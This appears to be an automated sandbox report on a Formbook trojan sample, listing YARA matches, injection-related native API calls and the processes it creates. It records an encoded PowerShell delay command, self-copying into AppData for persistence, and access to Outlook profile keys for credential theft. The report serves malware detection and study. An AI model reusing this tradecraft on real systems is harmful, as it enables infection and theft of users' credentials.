Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Detected potential crypto function
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016C6AA0 0_2_016C6AA0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016C5390 0_2_016C5390
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016C5317 0_2_016C5317
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016CF390 0_2_016CF390
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016C774D 0_2_016C774D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016C7960 0_2_016C7960
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_00403853 3_2_00403853
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_00401B30 3_2_00401B30
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_004055B3 3_2_004055B3
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_00420633 3_2_00420633
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0040BF6F 3_2_0040BF6F
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0040BF73 3_2_0040BF73
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_004057D3 3_2_004057D3
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_004017D8 3_2_004017D8
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_004017E0 3_2_004017E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176F900 3_2_0176F900
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018320A8 3_2_018320A8
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018328EC 3_2_018328EC
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821002 3_2_01821002
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0183E824 3_2_0183E824
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177B090 3_2_0177B090
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182DBD2 3_2_0182DBD2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01832B28 3_2_01832B28
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179EBB0 3_2_0179EBB0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018322AE 3_2_018322AE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01760D20 3_2_01760D20
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018325DD 3_2_018325DD
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01832D07 3_2_01832D07
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177D5E0 3_2_0177D5E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01831D55 3_2_01831D55
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792581 3_2_01792581
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177841F 3_2_0177841F
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182D466 3_2_0182D466
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01831FF1 3_2_01831FF1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01786E30 3_2_01786E30
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01832EF7 3_2_01832EF7
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182D616 3_2_0182D616
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: String function: 0176B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041E543 NtCreateFile, 3_2_0041E543
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041E5F3 NtReadFile, 3_2_0041E5F3
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041E673 NtClose, 3_2_0041E673
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041E723 NtAllocateVirtualMemory, 3_2_0041E723
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_017A9910
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A99A0 NtCreateSection,LdrInitializeThunk, 3_2_017A99A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_017A9860
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9840 NtDelayExecution,LdrInitializeThunk, 3_2_017A9840
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_017A98F0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9A50 NtCreateFile,LdrInitializeThunk, 3_2_017A9A50
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9A20 NtResumeThread,LdrInitializeThunk, 3_2_017A9A20
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_017A9A00
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9540 NtReadFile,LdrInitializeThunk, 3_2_017A9540
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A95D0 NtClose,LdrInitializeThunk, 3_2_017A95D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_017A9710
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_017A9FE0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_017A97A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_017A9780
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_017A9660
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_017A96E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9950 NtQueueApcThread, 3_2_017A9950
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A99D0 NtCreateProcessEx, 3_2_017A99D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017AB040 NtSuspendThread, 3_2_017AB040
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9820 NtEnumerateKey, 3_2_017A9820
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A98A0 NtWriteVirtualMemory, 3_2_017A98A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9B00 NtSetValueKey, 3_2_017A9B00
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017AA3B0 NtGetContextThread, 3_2_017AA3B0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9A10 NtQuerySection, 3_2_017A9A10
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9A80 NtOpenDirectoryObject, 3_2_017A9A80
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9560 NtWriteFile, 3_2_017A9560
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017AAD30 NtSetContextThread, 3_2_017AAD30
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9520 NtWaitForSingleObject, 3_2_017A9520
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A95F0 NtQueryInformationFile, 3_2_017A95F0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9770 NtSetInformationFile, 3_2_017A9770
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017AA770 NtOpenThread, 3_2_017AA770
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9760 NtOpenProcess, 3_2_017A9760
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9730 NtQueryVirtualMemory, 3_2_017A9730
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017AA710 NtOpenProcessToken, 3_2_017AA710
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9670 NtQueryInformationProcess, 3_2_017A9670
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9650 NtQueryValueKey, 3_2_017A9650
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9610 NtEnumerateValueKey, 3_2_017A9610
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A96D0 NtCreateKey, 3_2_017A96D0
Sample file is different than original file name gathered from version info
Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXnrxjhztihgifcu.dll" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000000.299213508.0000000000D98000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameXnrxjhztihgifcu.dll" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000003.00000003.381474937.0000000001523000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
Source: SC_0017384.exe, 00000003.00000003.383573088.00000000016CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
Source: SC_0017384.exe, 00000003.00000002.432025851.000000000185F000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
Source: SC_0017384.exe Binary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
Source: SC_0017384.exe ReversingLabs: Detection: 12%
Source: SC_0017384.exe Virustotal: Detection: 17%
Source: C:\Users\user\Desktop\SC_0017384.exe File read: C:\Users\user\Desktop\SC_0017384.exe Jump to behavior
Source: SC_0017384.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SC_0017384.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe File created: C:\Users\user\AppData\Roaming\Jqtuyob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgjipv3a.uw1.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@26/13@11/7
Source: C:\Users\user\Desktop\SC_0017384.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: SC_0017384.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SC_0017384.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:472:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_01
Source: C:\Users\user\Desktop\SC_0017384.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SC_0017384.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: SC_0017384.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SC_0017384.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
